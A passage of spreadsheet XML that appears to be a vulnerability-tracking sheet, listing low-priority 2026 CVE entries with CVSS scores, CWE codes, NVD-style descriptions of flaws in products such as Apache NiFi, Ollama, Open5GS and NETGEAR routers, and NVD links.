      <c r="F888" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G888" s="5" t="inlineStr"/>
      <c r="H888" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I888" s="5" t="inlineStr"/>
      <c r="J888" s="5" t="inlineStr"/>
      <c r="K888" s="5" t="inlineStr"/>
      <c r="L888" s="5" t="inlineStr">
        <is>
          <t>maven:org.apache.nifi:nifi-web-api</t>
        </is>
      </c>
      <c r="M888" s="5" t="inlineStr">
        <is>
          <t>2.10.0</t>
        </is>
      </c>
      <c r="N888" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O888" s="5" t="inlineStr"/>
      <c r="P888" s="5" t="inlineStr"/>
      <c r="Q888" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R888" s="5" t="inlineStr">
        <is>
          <t>Authorization handling for component configuration verification requests in Apache NiFi 1.15.0 through 2.9.0 allows clients with read access to submit proposed configuration properties. The proposed properties override current configuration, enabling users with read access to invoke predefined verification methods with alternative settings. Apache NiFi installations that do not implement different levels of authorization for viewing and modifying component configuration are not subject to this vulnerability. Upgrading to Apache NiFi 2.10.0 is the recommended mitigation, requiring write access to submit configuration verification requests.</t>
        </is>
      </c>
      <c r="S888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44911</t>
        </is>
      </c>
    </row>
    <row r="889">
      <c r="A889" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B889" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85383</t>
        </is>
      </c>
      <c r="D889" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E889" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F889" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G889" s="5" t="inlineStr"/>
      <c r="H889" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I889" s="5" t="inlineStr"/>
      <c r="J889" s="5" t="inlineStr"/>
      <c r="K889" s="5" t="inlineStr"/>
      <c r="L889" s="5" t="inlineStr"/>
      <c r="M889" s="5" t="inlineStr"/>
      <c r="N889" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O889" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P889" s="5" t="inlineStr"/>
      <c r="Q889" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R889" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in itsourcecode Sales and Inventory System 1.0. The affected element is an unknown function of the file /pages/inv_del.php. Executing a manipulation of the argument ID can lead to sql injection. The attack can be executed remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="S889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85383</t>
        </is>
      </c>
    </row>
    <row r="890">
      <c r="A890" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B890" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85408</t>
        </is>
      </c>
      <c r="D890" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E890" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F890" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G890" s="5" t="inlineStr"/>
      <c r="H890" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I890" s="5" t="inlineStr"/>
      <c r="J890" s="5" t="inlineStr"/>
      <c r="K890" s="5" t="inlineStr"/>
      <c r="L890" s="5" t="inlineStr"/>
      <c r="M890" s="5" t="inlineStr"/>
      <c r="N890" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O890" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P890" s="5" t="inlineStr"/>
      <c r="Q890" s="5" t="inlineStr">
        <is>
          <t>CWE-913, CWE-915</t>
        </is>
      </c>
      <c r="R890" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Eleveo Quality Management 9.7.0. Impacted is an unknown function of the file /enc-fwk-data/api/v3/conversations/&lt;ID&gt;/events of the component Conversation Handler. This manipulation of the argument createdBy causes dynamically-determined object attributes. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="S890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85408</t>
        </is>
      </c>
    </row>
    <row r="891">
      <c r="A891" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B891" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86172</t>
        </is>
      </c>
      <c r="D891" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E891" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F891" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G891" s="5" t="inlineStr"/>
      <c r="H891" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I891" s="5" t="inlineStr"/>
      <c r="J891" s="5" t="inlineStr"/>
      <c r="K891" s="5" t="inlineStr"/>
      <c r="L891" s="5" t="inlineStr"/>
      <c r="M891" s="5" t="inlineStr"/>
      <c r="N891" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O891" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P891" s="5" t="inlineStr"/>
      <c r="Q891" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R891" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in DefaultFuction CRM 1.0.0. This impacts an unknown function of the file /modules/customers/delete.php. Performing a manipulation of the argument ID results in sql injection. It is possible to initiate the attack remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="S891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86172</t>
        </is>
      </c>
    </row>
    <row r="892">
      <c r="A892" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B892" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86212</t>
        </is>
      </c>
      <c r="D892" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E892" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F892" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G892" s="5" t="inlineStr"/>
      <c r="H892" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I892" s="5" t="inlineStr"/>
      <c r="J892" s="5" t="inlineStr"/>
      <c r="K892" s="5" t="inlineStr"/>
      <c r="L892" s="5" t="inlineStr"/>
      <c r="M892" s="5" t="inlineStr"/>
      <c r="N892" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O892" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P892" s="5" t="inlineStr"/>
      <c r="Q892" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-285</t>
        </is>
      </c>
      <c r="R892" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Open5GS 2.7.7/2.8.0. This vulnerability affects unknown code of the component AMF/MME. The manipulation leads to improper authorization. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is 9468de94caed2fc940f4a23cbf734651896d0fde. To fix this issue, it is recommended to deploy a patch.</t>
        </is>
      </c>
      <c r="S892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86212</t>
        </is>
      </c>
    </row>
    <row r="893">
      <c r="A893" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B893" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86236</t>
        </is>
      </c>
      <c r="D893" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E893" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F893" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G893" s="5" t="inlineStr"/>
      <c r="H893" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I893" s="5" t="inlineStr"/>
      <c r="J893" s="5" t="inlineStr"/>
      <c r="K893" s="5" t="inlineStr"/>
      <c r="L893" s="5" t="inlineStr"/>
      <c r="M893" s="5" t="inlineStr"/>
      <c r="N893" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O893" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P893" s="5" t="inlineStr"/>
      <c r="Q893" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R893" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in itsourcecode Sales and Inventory System 1.0. This issue affects some unknown processing of the file /pages/pro_transac.php?action=add. Such manipulation of the argument Name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="S893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86236</t>
        </is>
      </c>
    </row>
    <row r="894">
      <c r="A894" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B894" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C894" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86241</t>
        </is>
      </c>
      <c r="D894" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E894" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F894" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G894" s="5" t="inlineStr"/>
      <c r="H894" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I894" s="5" t="inlineStr"/>
      <c r="J894" s="5" t="inlineStr"/>
      <c r="K894" s="5" t="inlineStr"/>
      <c r="L894" s="5" t="inlineStr"/>
      <c r="M894" s="5" t="inlineStr"/>
      <c r="N894" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O894" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P894" s="5" t="inlineStr"/>
      <c r="Q894" s="5" t="inlineStr">
        <is>
          <t>CWE-320, CWE-321</t>
        </is>
      </c>
      <c r="R894" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in liufee FeehiCMS up to 2.1.1. This impacts an unknown function of the file environments/prod/backend/config/main-local.php of the component Cookie Validation. This manipulation of the argument cookieValidationKey causes use of hard-coded cryptographic key
 . The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86241</t>
        </is>
      </c>
    </row>
    <row r="895">
      <c r="A895" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B895" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86281</t>
        </is>
      </c>
      <c r="D895" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E895" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F895" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G895" s="5" t="inlineStr"/>
      <c r="H895" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I895" s="5" t="inlineStr"/>
      <c r="J895" s="5" t="inlineStr"/>
      <c r="K895" s="5" t="inlineStr"/>
      <c r="L895" s="5" t="inlineStr"/>
      <c r="M895" s="5" t="inlineStr"/>
      <c r="N895" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O895" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P895" s="5" t="inlineStr"/>
      <c r="Q895" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-862</t>
        </is>
      </c>
      <c r="R895" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in SourceCodester Syllabus-Aligned Learning Management &amp; Examination System 1.0. This impacts an unknown function. Performing a manipulation results in cross-site request forgery. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks.</t>
        </is>
      </c>
      <c r="S895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86281</t>
        </is>
      </c>
    </row>
    <row r="896">
      <c r="A896" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B896" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C896" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86289</t>
        </is>
      </c>
      <c r="D896" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E896" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F896" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G896" s="5" t="inlineStr"/>
      <c r="H896" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I896" s="5" t="inlineStr"/>
      <c r="J896" s="5" t="inlineStr"/>
      <c r="K896" s="5" t="inlineStr"/>
      <c r="L896" s="5" t="inlineStr"/>
      <c r="M896" s="5" t="inlineStr"/>
      <c r="N896" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O896" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P896" s="5" t="inlineStr"/>
      <c r="Q896" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-190</t>
        </is>
      </c>
      <c r="R896" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Ollama up to 0.31.1. This issue affects the function readGGUFV1String of the file fs/ggml/gguf.go of the component GGUF Decoder. Performing a manipulation results in integer overflow. The attack is possible to be carried out remotely. The exploit has been made public and could be used. Upgrading to version 0.31.2-rc1 is capable of addressing this issue. The patch is named 67b6a1c2d45321e0cb3c04a18073f9818de7724b. It is recommended to upgrade the affected component.</t>
        </is>
      </c>
      <c r="S896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86289</t>
        </is>
      </c>
    </row>
    <row r="897">
      <c r="A897" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B897" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86294</t>
        </is>
      </c>
      <c r="D897" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E897" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F897" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G897" s="5" t="inlineStr"/>
      <c r="H897" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I897" s="5" t="inlineStr"/>
      <c r="J897" s="5" t="inlineStr"/>
      <c r="K897" s="5" t="inlineStr"/>
      <c r="L897" s="5" t="inlineStr"/>
      <c r="M897" s="5" t="inlineStr"/>
      <c r="N897" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O897" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P897" s="5" t="inlineStr"/>
      <c r="Q897" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R897" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in SourceCodester Simple Traffic Offense System 1.0. Affected by this issue is some unknown functionality of the file save-settings.php of the component Settings Update Endpoint. The manipulation of the argument site_name/site_desc leads to cross site scripting. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="S897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86294</t>
        </is>
      </c>
    </row>
    <row r="898">
      <c r="A898" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B898" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86310</t>
        </is>
      </c>
      <c r="D898" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E898" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F898" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G898" s="5" t="inlineStr"/>
      <c r="H898" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I898" s="5" t="inlineStr"/>
      <c r="J898" s="5" t="inlineStr"/>
      <c r="K898" s="5" t="inlineStr"/>
      <c r="L898" s="5" t="inlineStr"/>
      <c r="M898" s="5" t="inlineStr"/>
      <c r="N898" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O898" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P898" s="5" t="inlineStr"/>
      <c r="Q898" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R898" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in itsourcecode Sales and Inventory System 1.0. The affected element is an unknown function of the file /pages/cust_edit1.php. Such manipulation of the argument ID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="S898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86310</t>
        </is>
      </c>
    </row>
    <row r="899">
      <c r="A899" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B899" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86514</t>
        </is>
      </c>
      <c r="D899" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E899" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F899" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G899" s="5" t="inlineStr"/>
      <c r="H899" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I899" s="5" t="inlineStr"/>
      <c r="J899" s="5" t="inlineStr"/>
      <c r="K899" s="5" t="inlineStr"/>
      <c r="L899" s="5" t="inlineStr"/>
      <c r="M899" s="5" t="inlineStr"/>
      <c r="N899" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O899" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P899" s="5" t="inlineStr"/>
      <c r="Q899" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="R899" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in vgmstream up to r2117. This issue affects the function sscanf of the file src/meta/txth.c of the component txth-txtp. This manipulation causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. Patch name: 4669d37a6af94866f6f0628678f9f90d46954e8b. To fix this issue, it is recommended to deploy a patch.</t>
        </is>
      </c>
      <c r="S899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86514</t>
        </is>
      </c>
    </row>
    <row r="900">
      <c r="A900" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B900" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86668</t>
        </is>
      </c>
      <c r="D900" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E900" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F900" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G900" s="5" t="inlineStr"/>
      <c r="H900" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I900" s="5" t="inlineStr"/>
      <c r="J900" s="5" t="inlineStr"/>
      <c r="K900" s="5" t="inlineStr"/>
      <c r="L900" s="5" t="inlineStr"/>
      <c r="M900" s="5" t="inlineStr"/>
      <c r="N900" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O900" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P900" s="5" t="inlineStr"/>
      <c r="Q900" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R900" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in aircheng-org iWebShop-5 up to 5.15. The impacted element is the function uploadFile of the file controllers/pic.php. Such manipulation of the argument outerSrc/selectPhoto leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86668</t>
        </is>
      </c>
    </row>
    <row r="901">
      <c r="A901" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B901" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86674</t>
        </is>
      </c>
      <c r="D901" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E901" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F901" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G901" s="5" t="inlineStr"/>
      <c r="H901" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I901" s="5" t="inlineStr"/>
      <c r="J901" s="5" t="inlineStr"/>
      <c r="K901" s="5" t="inlineStr"/>
      <c r="L901" s="5" t="inlineStr"/>
      <c r="M901" s="5" t="inlineStr"/>
      <c r="N901" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O901" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P901" s="5" t="inlineStr"/>
      <c r="Q901" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="R901" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this vulnerability is the function session_start of the file login.php. The manipulation results in session fixiation. The attack can be launched remotely. The exploit has been made public and could be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86674</t>
        </is>
      </c>
    </row>
    <row r="902">
      <c r="A902" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B902" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87923</t>
        </is>
      </c>
      <c r="D902" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E902" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F902" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G902" s="5" t="inlineStr"/>
      <c r="H902" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I902" s="5" t="inlineStr"/>
      <c r="J902" s="5" t="inlineStr"/>
      <c r="K902" s="5" t="inlineStr"/>
      <c r="L902" s="5" t="inlineStr"/>
      <c r="M902" s="5" t="inlineStr"/>
      <c r="N902" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O902" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P902" s="5" t="inlineStr"/>
      <c r="Q902" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R902" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Rizwan17 inventory-management-system up to bfe78a330d01bb26b9daec5dc9ecd5c77900e03f. Affected by this issue is some unknown functionality of the file includes/DBOperation.php of the component List Handler. This manipulation of the argument category_name/brand_name/product_name causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="S902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87923</t>
        </is>
      </c>
    </row>
    <row r="903">
      <c r="A903" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B903" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9215</t>
        </is>
      </c>
      <c r="D903" s="5" t="n">
        <v>1.8</v>
      </c>
      <c r="E903" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F903" s="5" t="inlineStr">
        <is>
          <t>a2826606-91e7-4eb6-899e-8484bd4575d5</t>
        </is>
      </c>
      <c r="G903" s="5" t="inlineStr"/>
      <c r="H903" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I903" s="5" t="inlineStr"/>
      <c r="J903" s="5" t="inlineStr"/>
      <c r="K903" s="5" t="inlineStr">
        <is>
          <t>netgear:xr1000, netgear:xr1000_firmware, netgear:xr1000v2, netgear:xr1000v2_firmware, netgear:xr500, netgear:xr500_firmware</t>
        </is>
      </c>
      <c r="L903" s="5" t="inlineStr"/>
      <c r="M903" s="5" t="inlineStr"/>
      <c r="N903" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O903" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P903" s="5" t="inlineStr"/>
      <c r="Q903" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R903" s="5" t="inlineStr">
        <is>
          <t>A cross site request forgery (CSRF) vulnerability in the listed NETGEAR models allows an attacker who can leverage social engineering techniques on a router administrator to tamper with router configuration and disrupt router operations with active assistance from the router administrator. There is no confidentiality impact due to this vulnerability.</t>
        </is>
      </c>
      <c r="S903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9215</t>
        </is>
      </c>
    </row>
    <row r="904">
      <c r="A904" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B904" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9216</t>
        </is>
      </c>
      <c r="D904" s="5" t="n">
        <v>1.2</v>
      </c>
      <c r="E904" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F904" s="5" t="inlineStr">
        <is>
          <t>a2826606-91e7-4eb6-899e-8484bd4575d5</t>
        </is>
      </c>
      <c r="G904" s="5" t="inlineStr"/>
      <c r="H904" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I904" s="5" t="inlineStr"/>
      <c r="J904" s="5" t="inlineStr"/>
      <c r="K904" s="5" t="inlineStr">
        <is>
          <t>netgear:rax30, netgear:rax30_firmware, netgear:rax35, netgear:rax35_firmware, netgear:rax38, netgear:rax38_firmware, netgear:rax40, netgear:rax40_firmware, netgear:raxe300, netgear:raxe300_firmware</t>
        </is>
      </c>
      <c r="L904" s="5" t="inlineStr"/>
